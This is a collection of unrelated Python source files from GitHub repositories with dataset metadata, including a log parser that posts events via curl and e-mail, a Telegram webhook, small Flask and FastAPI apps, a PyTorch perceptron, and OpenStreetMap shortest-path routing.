self.__logger.info(LOG_MAX_TEXT_LEN * '-')\n self.__logger.info('Compose a list of events each in form of a dictionary.')\n\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('Calculate result tuples (T) and create result dictionaries (D).')\n i = 0\n for combi_item in combi_list_normalized_filtered.list:\n i += 1\n # calculate result tuples for replacing placeholders in the final result dictionary\n result_tuples = self.result_tuples(combi_item)\n self.__logger.debug('{}{}: {}'.format('T', i, result_tuples))\n # replace placeholders in the result dictionary by tuple values\n result_dict = self.fill_placeholders(self.__parser_result_fields, result_tuples)\n self.__logger.debug('{}{}: {}'.format('D', i, result_dict))\n # accumulate list of result dictionaries\n result_list.append(result_dict)\n\n return result_list\n\n def out_key_tuples(self, data, chunk_key):\n \"\"\"\n This function provides a list of unique tuples for the http chunk sending.\n Each tuple represents a key for collecting events to be sent in one chunk.\n :return: List of unique tuples for the http chunk sending\n\n Example:\n [('customerId','azse_datasynch'), ('customerId','hei_datasynch'), ('customerId','azse_datasynch')]\n \"\"\"\n t_list = []\n for d in data:\n for (k, v) in d.items():\n if k == chunk_key:\n t_list.append((k, v))\n # create a set of tuples in order to obtain unique items\n t_set = set(t_list)\n # return the set as a list of tuples\n return list(t_set)\n\n def curl_token(self, con):\n \"\"\"\n This function gets an authentication token from the ssd,\n after posting username and password.\n :param con: connection from connections file.\n :return: authentication token\n \"\"\"\n protocol = con['protocol']\n port = con['port']\n host = con['hostName']\n path = con['tokenPath']\n user = con['userName']\n pw = con['passWord']\n\n content_type = \"content-type: application/x-www-form-urlencoded\"\n url = protocol + \"://\" + host + \":\" + port + path\n data = \"client_id=pushClient&grant_type=password&scope=sportal&username=\" + user + \"&password=\" + pw\n\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('Get auth token from url: ' + url)\n result = ''\n with Popen([\"curl\", \"-XPOST\", \"-H\", content_type, url, \"-d\", data],\n stdout=PIPE, bufsize=1, universal_newlines=True) as p:\n for line in p.stdout:\n result = result + line\n return result\n\n def curl_result(self, data, con):\n \"\"\"\n This functions posts the data into the target url via curl.\n The data is sent in chunks that are built on the basis of the same customerId.\n Because the target url does contain the customerId in it's path.\n Every single json event is sent separately\n :param data: Data to be sent to the target url.\n :param con: connection from connections file.\n :return: True - success, False - failed.\n \"\"\"\n intend = LOG_INTEND * ' '\n\n try:\n protocol = con['protocol']\n port = con['port']\n host = con['hostName']\n path = con['eventPath']\n except AttributeError:\n return False\n\n json_token = json.loads(self.curl_token(con)) # contains multiple token parameters\n access_token = json_token['access_token'] # extract the access token string exclusively\n authorization = \"authorization: Bearer \" + access_token\n content_type = \"content-type: application/json\"\n\n self.__logger.info(LOG_MAX_TEXT_LEN * '-')\n self.__logger.info('Send ' + str(len(data)) + ' events via cURL to SSD.')\n result = ''\n for (k, v) in self.out_key_tuples(data, self.__parser_http_out_chunk_key):\n # calculate chunk of result list due to chunkKey\n c_list = [d for d in data if d[k] == v]\n url = protocol + \"://\" + host + \":\" + port + path.replace(PH_CUSTOMER_ID, v)\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug(intend + 'Send ' + str(len(c_list)) + ' events for ' + v + '.')\n self.__logger.debug(intend + 'URL: ' + url)\n # send every single json event separately\n for c_event in c_list:\n with Popen([\"curl\", \"-XPOST\", \"-H\", authorization, \"-H\", content_type, url, \"-d\", json.dumps(c_event)],\n stdout=PIPE, bufsize=1, universal_newlines=True) as p:\n for line in p.stdout:\n result += line\n result += '\\n'\n return True\n\n def mail_result(self, data, con):\n \"\"\"\n This functions sends the data to a mailbox.\n The data is sent in chunks that are built on the basis of the same chunkKey (here customerId).\n Because the target mailbox expects the chunkKey enclosed in square brackets in the mail subject.\n All json events of one chunkKey are sent in one e-mail.\n :param data: Data to be sent to the target url.\n :param con: connection from connections file.\n :return: True - success, False - failed.\n \"\"\"\n intend = LOG_INTEND * ' '\n\n try:\n protocol = con['protocol']\n host = con['hostName']\n addr_to = con['to']\n addr_from = con['from']\n subject_ph = con['subject'] # get subject with placeholder\n body_delim = con['bodyDelimiter']\n except AttributeError:\n return False\n\n self.__logger.info(LOG_MAX_TEXT_LEN * '-')\n self.__logger.info('Send ' + str(len(data)) + ' events via ' + protocol + ' e-mail to SSD.')\n body = ''\n for (k, v) in self.out_key_tuples(data, self.__parser_mail_out_chunk_key):\n # calculate chunk of result list due to chunkKey\n c_list = [d for d in data if d[k] == v]\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug(intend + 'Send ' + str(len(c_list)) + ' events for ' + v + '.')\n self.__logger.debug(intend + 'From: ' + addr_from)\n self.__logger.debug(intend + 'To: ' + addr_to)\n # calculate mail subject and body\n subject = subject_ph.replace(PH_CHUNK_KEY, v)\n body = body_delim + '\\n' + json.dumps(c_list) + '\\n' + body_delim\n\n # compose mail\n msg = MIMEText(body)\n msg['Subject'] = subject\n msg['From'] = addr_from\n msg['To'] = addr_to\n \n try:\n # Send the message via SMTP server.\n s = smtplib.SMTP(host)\n s.send_message(msg)\n s.quit()\n except Exception as e:\n self.__logger.error('Failed sending events for ' + v + 'via e-mail to SSD, message: ' + e) \n\n return True\n\n def log_info(self):\n \"\"\"\n This function logs basic information about the log parser.\n :return: log entries about log file and parser\n \"\"\"\n intend = LOG_INTEND * ' '\n self.__logger.info(LOG_MAX_TEXT_LEN * '-')\n self.__logger.info('Log:')\n self.__logger.info(intend + '{:12}{}'.format('id:', self.__log_id))\n self.__logger.info(intend + '{:12}{}'.format('name:', self.__log_name))\n self.__logger.info(intend + '{:12}{}'.format('fileName:', self.__log_filename))\n self.__logger.info('Parser:')\n self.__logger.info(intend + '{:12}{}'.format('id:', self.__parser_id))\n self.__logger.info(intend + '{:12}{}'.format('info:', self.__parser_text))\n if self.__parser_regex_positive:\n status = '\"ok\"'\n else:\n status = '\"error\"'\n self.__logger.info(intend + '{:12}{}'.format('search:', 'Found lines are interpreted as ' + status + '.'))\n self.__logger.info(LOG_MAX_TEXT_LEN * '-')\n # debug info\n self.__logger.debug('Log dictionary:')\n for line in pprint.pformat(self.__dict_log).split('\\n'):\n self.__logger.debug(intend + '{}'.format(line))\n self.__logger.debug('')\n self.__logger.debug('Parser dictionary:')\n for line in pprint.pformat(self.__dict_parser).split('\\n'):\n self.__logger.debug(intend + '{}'.format(line))\n self.__logger.debug(LOG_MAX_TEXT_LEN * '-')\n self.__logger.debug('')\n\n pass\n\n def dump(self):\n print('\\tlog_name: {}'.format(self.__log_name))\n print('\\tlog_type: {}'.format(self.__log_type))\n print('\\tlog_pathname: {}'.format(self.__log_pathname))\n print('\\tlog_filename: {}'.format(self.__log_filename))\n print('\\tlog_date_exists: {}'.format(self.log_date_exists))\n print('\\tlog_date_format: {}'.format(self.__log_date_format))\n print('\\tlog_date_regex: {}'.format(self.__log_date_regex))\n print('\\tparser_id: {}'.format(self.__parser_id))\n print('\\tparser_regex: {}'.format(self.__parser_regex))\n print('\\tparser_key_level: {}'.format(self.__parser_key_level))\n print('\\tparser_search_col: {}'.format(self.__parser_search_col))\n print('\\tparser_chunk_size: {}'.format(self.__parser_chunk_size))\n print('\\tparser_chunk_offset: {}'.format(self.__parser_chunk_offset))\n print('\\tparser_chunk_number: {}'.format(self.__parser_chunk_number))\n print('\\tparser_chunk_counter: {}'.format(self.__parser_chunk_index))\n print('\\tparser_time_offset: {}'.format(self.__parser_time_offset))\n print('\\tparser_time_interval: {}'.format(self.__parser_time_interval))\n print('\\tparser_dt_start: {}'.format(self.__parser_dt_start))\n print('\\tparser_dt_end: {}'.format(self.__parser_dt_end))\n print('\\tparser_group_slice: {}\\n'.format(self.__parser_group_slice))\n","repo_name":"uc007/logparser","sub_path":"lib/lopa.py","file_name":"lopa.py","file_ext":"py","file_size_in_byte":54680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74565122754","text":"import json\nimport hashlib\n\nimport httpx\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\n\nfrom .models import WebhookResponse, RegisteredBot\n\n\ndef redirect_from_index(request):\n return redirect('show_request_data')\n\n\n@csrf_exempt\ndef show_request_data(request):\n if request.method == 'POST':\n request_data = json.loads(request.body)\n elif request.method == 'GET':\n request_data = dict(request.GET.items())\n if request_data:\n new_entry = WebhookResponse.objects.create(response_content=request_data)\n headers = dict(request.headers)\n if headers.get('X-Telegram-Bot-Api-Secret-Token'):\n hashed_token = hashlib.sha256(\n headers.get('X-Telegram-Bot-Api-Secret-Token').encode()\n )\n bot = get_object_or_404(RegisteredBot, secret_token_hash=hashed_token.hexdigest())\n chat_id = request_data['message']['chat'].get('id')\n message_text = request_data['message'].get('text')\n \n sent_message = httpx.get(\n f'https://api.telegram.org/bot{bot.API_token}/sendMessage', \n params={'chat_id': chat_id, 'text': f'Вы написали: {message_text}'}\n )\n return JsonResponse(request_data)\n \n","repo_name":"SergIvo/tg-webhook-test","sub_path":"connector/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30203932159","text":"# server.py\n\n\nfrom flask import Flask, request, jsonify\n\n\napp = Flask(__name__)\n\n\n# give decorator to app to access route\n@app.route(\"/\", methods=[\"GET\"])\ndef server_status():\n return \"Server is on.\"\n # I would visit http://127.0.0.1:5000/ to access this route\n\n\n@app.route(\"/info\", methods=[\"GET\"])\ndef information():\n x = \"This website will calculate blood cholesterol levels\\n\"\n x += \"It is written by Seijung Kim\"\n return x\n\n\n@app.route(\"/hdl_check\", methods=[\"POST\"])\ndef hdl_check_from_internet():\n # usually, the info sent is stored in dictionary\n '''\n incoming_json = {\"name\": ,\n \" hdl_value\": }\n '''\n from blood_calculator import check_HDL\n in_data = request.get_json()\n hdl_value = in_data[\"hdl_value\"]\n print(\"The received value was {}\".format(hdl_value))\n answer = check_HDL(hdl_value)\n return answer\n\n\n@app.route(\"/add_numbers\", methods=[\"POST\"])\ndef add_numbers_to_internet():\n '''\n {\"a\": 5, \"b\": 12}\n return sum of these numbers\n '''\n in_data = request.get_json()\n value_a = in_data[\"a\"]\n value_b = in_data[\"b\"]\n sum = value_a + value_b\n # answer = \"The sum of {} and {} is {}\".format(value_a, value_b, str(sum))\n answer = sum\n return jsonify(answer)\n\n\n@app.route(\"/add//\", methods=[\"GET\"])\ndef add_variable_url(a, b): # for a, for b\n answer = int(a) + int(b)\n return jsonify(answer)\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"seij001/BME547_Fall2022","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37309970657","text":"month = [\n \"January\",\n \"February\",\n \"March\",\n \"April\",\n \"May\",\n \"June\",\n \"July\",\n \"August\",\n \"September\",\n \"October\",\n \"November\",\n \"December\"\n]\nday = [\"01\",\"02\",\"03\",\"04\",\"05\",\"06\",\"07\",\"08\",\"09\",\"10\",\n \"11\",\"12\",\"13\",\"14\",\"15\",\"16\",\"17\",\"18\",\"19\",\"20\",\n \"21\",\"22\",\"23\",\"24\",\"25\",\"26\",\"27\",\"28\",\"29\",\"30\",\"31\"]\n\nmonthInNumeric = [\"01\", \"02\", \"03\", \"04\",\n \"05\", \"06\", \"07\", \"08\", \n \"09\", \"10\", \"11\", \"12\"]\ndate = input()\nif date.find(\"/\") != -1:\n date = date.split(\"/\") \n try:\n finaldate = date[2] + \"-\" + monthInNumeric[int(date[0])-1] + \"-\" + day[int(date[1])-1]\n print(finaldate)\n except(NameError,ValueError,IndexError):\n print(\"something error\")\nelse:\n date = date.replace(\",\" , \"\")\n date = date.split(\" \")\n try:\n finaldate = date[2] + \"-\" + monthInNumeric[month.index(date[0])]+ \"-\" + day[int(date[1])-1]\n print(finaldate)\n\n except (NameError, ValueError, IndexError):\n print(\"something error\")\n \n","repo_name":"TamariPopkhadze/Task21","sub_path":"outdated.py","file_name":"outdated.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"99507446","text":"def preprocess(mat, _n,_m):\n s = [[0 for j in range(_m)] for i in range(_n)] # новая матрица\n # первый аргумент новой матрицы равен первому аргументу начальной\n s[0][0] = mat[0][0]\n for i in range(1, _m): # заполнение первой строки значениями\n s[0][i] = mat[0][i]+s[0][i-1]\n for i in range(1, _n): # заполнение первого столбца значениями\n s[i][0] = mat[i][0]+s[i-1][0]\n for i in range(1, _n): # заполнение оставшейся матрицы\n for j in range(1, _m):\n s[i][j] = mat[i][j]+s[i-1][j]+s[i][j-1]-s[i-1][j-1]\n return s\n\n\nmatrix = []\nn, m, k = map(int, input().split())\nfor i in range(n):\n matrix.append(list(map(int, input().split())))\n# получили уже новую матрицу с нужными значениями\nmatrix = preprocess(matrix, n, m)\nfor i in range(k):\n a, b, c, d = map(int, input().split())\n # total равен mat[c][d] - mat[c][b-1] - mat[a-1][d] + mat[a-1][b-1] так как значение указываются абсолютные вычитаем ещё по единице отовсюду\n total = matrix[c-1][d-1]\n # проверка границ\n if b - 2 >= 0:\n total -= matrix[c-1][b-2]\n if a - 2 >= 0:\n total -= matrix[a-2][d-1]\n if a-2 >= 0 and b-2 >= 0:\n total += matrix[a-2][b-2]\n print(total)\n","repo_name":"virdgin/Lean-and-Traning","sub_path":"yandex.algorithm_3/9_sum_mat.py","file_name":"9_sum_mat.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42037365895","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 15 01:54:45 2021\n\n@author: duma\n\"\"\"\nimport collections\nimport heapq\nimport sys\nfrom matplotlib import pyplot\nfrom math import radians, cos, sin, asin, sqrt\nimport networkx as nx\nimport numpy as np\nimport pandas as pd\nimport regex as re\nfrom math import radians, cos, sin, asin, sqrt\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\n\ngraph = {}\nvertices_no = 0\n\ndef haversine_distance(lon1, lat1, lon2, lat2, unit_m=True):\n \"\"\"\n Calculate the great circle distance between two points\n on the earth (specified in decimal degrees)\n default unit : km\n \"\"\"\n # convert decimal degrees to radians\n lon1, lat1, lon2, lat2 = map(radians, [lon1, lat1, lon2, lat2])\n\n # haversine formula\n dlon = lon2 - lon1\n dlat = lat2 - lat1\n a = sin(dlat / 2)**2 + cos(lat1) * cos(lat2) * sin(dlon / 2)**2\n c = 2 * asin(sqrt(a))\n r = 6371 # Radius of the Earth in kilometers. Use 3956 for miles\n if unit_m:\n r *= 1000\n return c * r\n\ndef add_vertex(v):\n global graph\n global vertices_no\n if v in graph:\n pass\n else:\n vertices_no = vertices_no + 1\n graph[v] = []\n\n# Add an edge between vertex v1 and v2 with edge weight e\ndef add_edge(v1, v2, e):\n global graph\n # Check if vertex v1 is a valid vertex\n if v1 not in graph:\n pass\n # Check if vertex v2 is a valid vertex\n elif v2 not in graph:\n pass\n else:\n # Since this code is not restricted to a directed or \n # an undirected graph, an edge between v1 v2 does not\n # imply that an edge exists between v2 and v1\n temp = [v2, e]\n graph[v1].append(temp)\n\n\n# Print the graph\n \ndef write_edges_file(file_name):\n global graph\n with open(file_name, 'w') as f:\n for vertex in graph:\n for edges in graph[vertex]:\n line = vertex+' '+str(edges[0])+' '+str(edges[1])+'\\n'\n f.write(line)\n f.close()\n \ndef shortestPath(edges, source, sink):\n # create a weighted DAG - {node:[(cost,neighbour), ...]}\n graph = collections.defaultdict(list)\n for l, r, c in edges:\n graph[l].append((c,r))\n # create a priority queue and hash set to store visited nodes\n queue, visited = [(0, source, [])], set()\n heapq.heapify(queue)\n # traverse graph with BFS\n while queue:\n (cost, node, path) = heapq.heappop(queue)\n # visit the node if it was not visited before\n if node not in visited:\n visited.add(node)\n path = path + [node]\n # hit the sink\n if node == sink:\n return (cost, path)\n # visit neighbours\n for c, neighbour in graph[node]:\n if neighbour not in visited:\n heapq.heappush(queue, (cost+c, neighbour, path))\n return float(\"inf\")\n\n\n\nif __name__ == '__main__':\n\n if(len(sys.argv)<3):\n print(\"Correct usage is: python3 shortest_path_graph.py source target\")\n sys.exit()\n\n\n file = open('bilecik_modified.osm')\n lines = file.readlines()\n\n nodes = {}\n way = []\n ways = {}\n checkpoints = []\n\n way_flag = 0 ## to understand \n save_flag = 0 ## to save\n\n for line in lines: ## iterate over the osm file \n\n if (way_flag == 1):\n\n if(line.find(\"k=\\'highway\\'\") != -1): ## if highway\n if(line.find(\"v=\\'footway\\'\") == -1): ## if not footway\n save_flag = 1 ## save it when find /way\n continue\n continue\n \n elif(line.find(\"\")) != -1:\n\n way_flag = 0\n if(save_flag == 1): ## if we found way closing tag and its highway not footway save\n ways[way[0]] = way[1:]\n save_flag = 0\n way = []\n\n elif(line.find(\"1:\n checkpoints.append(key)\n for key, value in ways.items():\n if len(value) > 0:\n checkpoints.append(value[0])\n checkpoints.append(value[-1])\n myset = set(checkpoints)\n checkpoints = list(myset)\n checkpoints.sort()\n with open('checkpoints.txt', 'w') as f:\n for c in checkpoints:\n f.write(c+'\\n')\n f.close()\n\n \n ## Creating new vertices and edges based on checkpoints\n for key, value in ways.items():\n distance = 0\n length = len(value)\n \n if length < 2: ## means there is a problem with ways list\n continue\n \n start_node = value[0]\n \n if length == 2:\n lat1 = float(nodes[value[0]][0])\n lon1 = float(nodes[value[0]][1])\n lat2 = float(nodes[value[1]][0])\n lon2 = float(nodes[value[1]][1])\n distance = haversine_distance(lon1,lat1,lon2,lat2)\n add_vertex(start_node)\n add_vertex(value[1])\n add_edge(start_node,value[1],distance)\n continue\n\n for i in range(1,length): ## sum distance between x and x+1, iterate over the list to the end or a checkpoint\n\n lat1 = float(nodes[value[i-1]][0])\n lon1 = float(nodes[value[i-1]][1])\n lat2 = float(nodes[value[i]][0])\n lon2 = float(nodes[value[i]][1])\n distance += haversine_distance(lon1,lat1,lon2,lat2)\n \n if value[i] in checkpoints:\n add_vertex(start_node)\n add_vertex(value[i])\n add_edge(start_node,value[i],distance)\n distance = 0\n start_node = value[i]\n continue\n elif value[i] == value[-1]:\n add_vertex(start_node)\n add_vertex(value[i])\n add_edge(start_node,value[i],distance)\n continue\n \n write_edges_file('edges.txt')\n\n edges = []\n file = open('edges.txt')\n lines = file.readlines()\n for line in lines:\n line = line.strip()\n line = line.split(' ')\n source = str(line[0])\n target = str(line[1])\n weight = int(float(line[2]))\n temp_list = []\n temp_list.append(source)\n temp_list.append(target)\n temp_list.append(weight)\n edges.append(temp_list)\n file.close()\n\n source = '2024879246'\n target = '8982649767'\n\n output =shortestPath(edges, sys.argv[1], sys.argv[2])\n if(output == inf):\n print(\"Unfortunately there is no new path, you need to wait until the way is opened.\")\n break\n G=nx.Graph()\n\n file = open('edges.txt')\n lines = file.readlines()\n for line in lines:\n line = line.split(' ')\n\n lat1 = nodes[line[0]][0]\n lon1 = nodes[line[0]][1]\n lat2 = nodes[line[1]][0]\n lon2 = nodes[line[1]][1]\n \n G.add_node(line[0],pos=(lat1,lon1))\n G.add_node(line[1],pos=(lat2,lon2))\n if line[0] not in output[1]:\n G.add_edge(line[0],line[1],color='b',weight=1)\n else:\n pass\n \n file.close()\n\n\n for i in range(len(output[1])-1):\n G.add_edge(output[1][i],output[1][i+1],color='r',weight=20)\n\n colors = nx.get_edge_attributes(G,'color').values()\n weights = nx.get_edge_attributes(G,'weight').values()\n\n my_pos = nx.spring_layout(G, seed = 2) ## seed to keep graph same.\n plt.figure(figsize=(25,25))\n nx.draw(G,my_pos,width=list(weights),edge_color=colors)\n\n now = datetime.now()\n dt_string = now.strftime(\"%d/%m/%Y %H:%M:%S\")\n dt_string = dt_string.replace(' ','-')\n dt_string = dt_string.replace('/','-')\n dt_string = dt_string.replace(':','-')\n print(dt_string)\n plt.savefig(dt_string+'.png')\n","repo_name":"tahayusufkomur/urban_routing_project","sub_path":"problem e/shortest_path_graph.py","file_name":"shortest_path_graph.py","file_ext":"py","file_size_in_byte":8766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73845913793","text":"import sys\n\n\ndef findTorque(a, b, c):\n R = -b / (2 * a)\n return a * R ** 2 + b * R + c\n\n\nif __name__ == \"__main__\":\n inputs = sys.stdin.readlines()\n outputs = []\n\n # Read inputs\n tc = int(inputs[0])\n i = 1\n for _ in range(tc):\n n = int(inputs[i])\n i += 1\n\n gears = [tuple(map(int, row.split())) for row in inputs[i : i + n]]\n i += n\n\n maxTorque = ans = 0\n for id, (a, b, c) in enumerate(gears, start=1):\n torque = findTorque(-a, b, c)\n if torque > maxTorque:\n maxTorque = torque\n ans = id\n print(ans)\n","repo_name":"jetkan-yk/phyting","sub_path":"cp4/cs/growlinggears.py","file_name":"growlinggears.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39987435324","text":"from typing import Optional, List\n\nfrom fastapi import APIRouter, Depends, Response\nfrom pydantic import BaseModel, Field\nfrom src.db.dals.book_dal import BookDAL\nfrom src.db.models.book import Book\nfrom src.requests.books.BookRequest import BookRequest\nfrom src.controllers.api.BookController import BookController\nfrom dependencies import get_book_dal\n\nrouter = APIRouter(\n prefix='/books',\n tags=['books']\n)\n\n\nclass Todo(BaseModel):\n title: str\n description: Optional[str]\n priority: int = Field(gt=0, lt=6, description='Priority must be between 1 to 5')\n complete: bool\n\n\n@router.post(\"/\", )\n# async def create_book(name: str, author: str, release_year: int, book_dal: BookDAL = Depends(get_book_dal)):\n# return await book_dal.create_book(name, author, release_year)\nasync def create_book(request: BookRequest,\n book_controller: BookController = Depends(BookController)):\n return await book_controller.create_books(request)\n # return request\n\n\n@router.put(\"/{book_id}\")\nasync def update_book(book_id: int,\n name: Optional[str] = None,\n author: Optional[str] = None,\n release_year: Optional[int] = None,\n book_dal: BookDAL = Depends(get_book_dal)):\n return await book_dal.update_book(book_id, name, author, release_year)\n\n\n# @router.get(\"/books\")\n# async def get_all_books(book_dal: BookDAL = Depends(get_book_dal)) -> List[Book]:\n# return await book_dal.get_all_books()\n","repo_name":"NileshSaha/python_async","sub_path":"src/routers/books/book_router.py","file_name":"book_router.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27985464948","text":"# coding: utf8\n# !/usr/bin/env python\n# ------------------------------------------------------------------------\n# Perceptron en pytorch (en utilisant juste les tenseurs)\n# Écrit par Mathieu Lefort\n#\n# Distribué sous licence BSD.\n# ------------------------------------------------------------------------\n\n# Rendu de Khaled ABDRABO (p1713323) et Jean BRIGNONE (p1709655)\n\nimport gzip, numpy, torch\n\nif __name__ == '__main__':\n # Hyperparamètres\n #\n # eta : responsable du taux de variation dans les poids.\n # Plus sa valeur est grande, plus l'algorithme converge rapidement avec des résultats moins précis.\n # Au contraire, plus sa valeur est faible, l'algorithme converge plus\n # lentement mais se rapproche des bonnes résultats.\n # Si la valeur est beaucoup trop grande, le modèle apprend trop vite et donc il finit par rien apprendre.\n #\n # w_min et w_max : sont les poids de départs. Quand ils se rapprochent de 0, l'algorithme converge plus rapidement.\n\n batch_size = 5 # nombre de données lues à chaque fois\n nb_epochs = 10 # nombre de fois que la base de données sera lue\n eta = 0.001 # taux d'apprentissage 0.001\n w_min = -0.001 # poids minimum\n w_max = 0.001 # poids maximum\n nb_neurones_cc = 784 # nombre de neurones de la couche cachée\n #f = open(\"res.txt\", \"a\")\n\n # on lit les données\n ((data_train, label_train), (data_test, label_test)) = torch.load(gzip.open('mnist.pkl.gz'))\n\n # on initialise le modèle et ses poids\n # taille du tenseur w = 784 (data_train.shape[1]) * 10 (label_train.shape[1]) = 28*28*10 = 7840\n w = torch.empty((data_train.shape[1], nb_neurones_cc), dtype=torch.float)\n wcc = torch.empty((nb_neurones_cc, label_train.shape[1]), dtype=torch.float)\n\n # taille du tenseur b = 1*10 = 10\n b = torch.empty((1, label_train.shape[1]), dtype=torch.float)\n bcc = torch.empty((1, nb_neurones_cc), dtype=torch.float)\n torch.nn.init.uniform_(w, w_min, w_max)\n torch.nn.init.uniform_(wcc, w_min, w_max)\n torch.nn.init.uniform_(b, w_min, w_max)\n torch.nn.init.uniform_(bcc, w_min, w_max)\n\n nb_data_train = data_train.shape[0]\n nb_data_test = data_test.shape[0]\n # taille du tenseur indices = 12600 (les 63000 / 5 [batch_size])\n indices = numpy.arange(nb_data_train, step=batch_size)\n\n for n in range(nb_epochs):\n # on mélange les (indices des) données\n numpy.random.shuffle(indices)\n # on lit toutes les données d'apprentissage\n for i in indices:\n # on récupère les entrées\n # taille du tenseur x = 5 * 784 = 3920\n x = data_train[i:i + batch_size]\n # on calcule la sortie de la couche cachée\n ycc = 1 / (1 + torch.exp(- (torch.mm(x, w) + bcc)))\n # on calcule la sortie du modèle\n # taille du tenseur y = 5 * 10 = 50\n y = torch.mm(ycc, wcc) + b \n # on regarde les vrais labels\n # taille du tenseur t = 5 * 10 = 50\n t = label_train[i:i + batch_size]\n # on met à jour les poids\n # taille du tenseur du gradiant = 5 * 10 = 50\n grad = (t - y)\n gradcc = ycc * (1 - ycc) * torch.mm(grad, wcc.T)\n\n wcc += eta * torch.mm(ycc.T, grad)\n w += eta * torch.mm(x.T, gradcc)\n\n bcc += eta * gradcc.sum(axis=0)\n b += eta * grad.sum(axis=0)\n\n # test du modèle (on évalue la progression pendant l'apprentissage)\n # conteur des bonnes réponses\n acc = 0.\n # on lit toutes les données de test\n for i in range(nb_data_test):\n # on récupère l'entrée\n # taille du tenseur x = 1 * 784 = 784\n x = data_test[i:i + 1]\n # on calcule la sortie du modèle\n # taille du tenseur y = 1 * 10 = 10\n ycc = 1 / (1 + torch.exp(- (torch.mm(x, w) + bcc)))\n y = torch.mm(ycc, wcc) + b \n # on regarde le vrai label\n # taille du tenseur t = 1 * 10 = 10\n t = label_test[i:i + 1]\n # on regarde si la sortie est correcte\n acc += torch.argmax(y, 1) == torch.argmax(t, 1)\n # on affiche le pourcentage de bonnes réponses\n print(acc / nb_data_test * 100)\n #f.write(str(acc / nb_data_test * 100))\n #f.close()","repo_name":"khaledabdrabo98/basic-perceptrons","sub_path":"perceptron_pytorch.py","file_name":"perceptron_pytorch.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72574764355","text":"import matplotlib.pyplot as plt\nfrom settings import *\nimport random\n\n\ndef plot_cluster(result, trainingData, numOfClass):\n plt.figure(2)\n # create numOfClass empty lists\n lab = [[] for i in range(numOfClass)]\n index = 0\n for lab_i in result:\n lab[lab_i].append(index)\n index += 1\n color = ['oy', 'ob', 'og', 'cs', 'ms', 'bs', 'ks', 'ys', 'yv', 'mv', 'bv', 'kv', 'gv', 'y^', 'm^', 'b^', 'k^',\n 'g^'] * 3\n for i in range(numOfClass):\n x1 = []\n y1 = []\n for data in trainingData[lab[i]]:\n try:\n x1.append(data[0])\n y1.append(data[1])\n except Exception as e:\n print(e)\n plt.plot(x1, y1, color[i])\n plt.show()\n\n\ndef plot_result(data, cluster_res, cluster_num, algorithm='None'):\n nPoints = len(data)\n scatter_colors = ['blue', 'green', 'yellow', 'red', 'purple', 'orange', 'brown']\n for i in range(cluster_num):\n color = scatter_colors[i % len(scatter_colors)]\n x1 = []\n y1 = []\n for j in range(nPoints):\n if cluster_res[j] == i:\n x1.append(data[j, 0])\n y1.append(data[j, 1])\n plt.scatter(x1, y1, c=color, alpha=1, marker='o')\n plt.plot(marksize=10)\n plt.savefig(PLOT_DIR + algorithm + '-' + str(random.randint(10, 100)) + str(cluster_num) + '.png')\n plt.show()\n\n\ndef plot_labels(labels: list, training_data):\n unique_labels = set(labels)\n colors = ['blue', 'green', 'yellow', 'red', 'purple', 'orange', 'brown']\n for label, color in zip(unique_labels, colors):\n if label == -1:\n color = [0, 0, 0, 1]\n\n class_member_mask = (labels == label)\n","repo_name":"FesonX/cn-text-classifier","sub_path":"tools/visualizer.py","file_name":"visualizer.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"61"} +{"seq_id":"21259951157","text":"# -*- coding: utf-8 -*-\n\"\"\"\n @Author: Xingqi Tang\n @Created: 2018/5/16 18:52\n @Name: fifo\n @Project: neu_curriculum\n\"\"\"\nimport rand_page\n\nseries_size = 20\nrandom_size = 7\n\n\ndef fifo(buffer, access_s):\n lst = []\n count = 0\n # flag = 0\n\n print(\"FIFO algorithm:\\n\")\n for s in access_s:\n if s in lst[::2]:\n list_a = lst[::2]\n lst[list_a.index(s) * 2 + 1] += 1\n print(s, ' ', lst[::2])\n continue\n else:\n list_b = lst[1::2]\n\n if len(lst) < 2 * buffer:\n lst.append(s)\n lst.append(1)\n else:\n c = list_b.index(max(list_b))\n lst[2 * c] = s\n lst[2 * c + 1] = 1\n print(s, ' ', lst[::2], 'MISSING ')\n count += 1\n print(\"memory_size is : {}\".format(buffer))\n print(\"fifo missing rate is:{:.2f}\\n\".format(count / len(access_s)))\n\n\n# def main():\n # access_series = [7, 0, 1, 2, 0, 3, 0, 4, 2, 3, 0, 3, 2, 1, 2, 0, 1, 7, 0, 1]\n # access_series = rand_page.random_list(0, random_size, 